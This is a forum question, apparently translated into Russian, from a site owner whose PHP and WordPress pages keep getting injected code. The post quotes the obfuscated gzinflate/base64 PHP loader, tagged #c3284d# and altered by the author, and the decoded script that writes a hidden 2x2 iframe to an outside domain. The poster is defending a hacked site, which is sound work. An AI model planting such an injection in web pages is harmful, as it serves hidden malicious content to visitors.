Атака iframe на веб-сайт -вставляет код в источник

За последние несколько дней мой сайт неоднократно становился объектом атаки iframe. Код добавляется в основном к страницам PHP и Javascript. Затем код кодируется PHP base 64, см. пример (. Я немного изменил код, чтобы нейтрализовать его ):

#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8    VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#

. Это расшифровано выглядит примерно так:

<script type="text/javascript">
    document.write(
        '<iframe src="http://opticmoxie.com/xxxxxxx.php"     
         name="Twitter" scrolling="auto" frameborder="no" 
         align="center" height="2" width="2"></iframe>'
    );

Общим является то, что весь код имеет комментарий «#c3284d #», поэтому отследить вредоносный код не составляет труда. Но это требует времени...

Мы находимся на общем сервере в Gradwell (UK ), и они не особенно помогли. Итак, вопрос в том, что я могу сделать, чтобы эта проблема не повторялась? Я знаю об атаках MySQL Injection и использую PHP mysql _real _escape _для защиты от таких атак.

Сайт на PHP и MySQL диск. Мы используем MySQLFTP и имеем учетную запись оболочки для доступа по SSH. Мы используем последнее обновление Wordpress (с активированными плагинами de -).

6
задан Paweł Tomkiel 8 March 2015 в 17:49
поделиться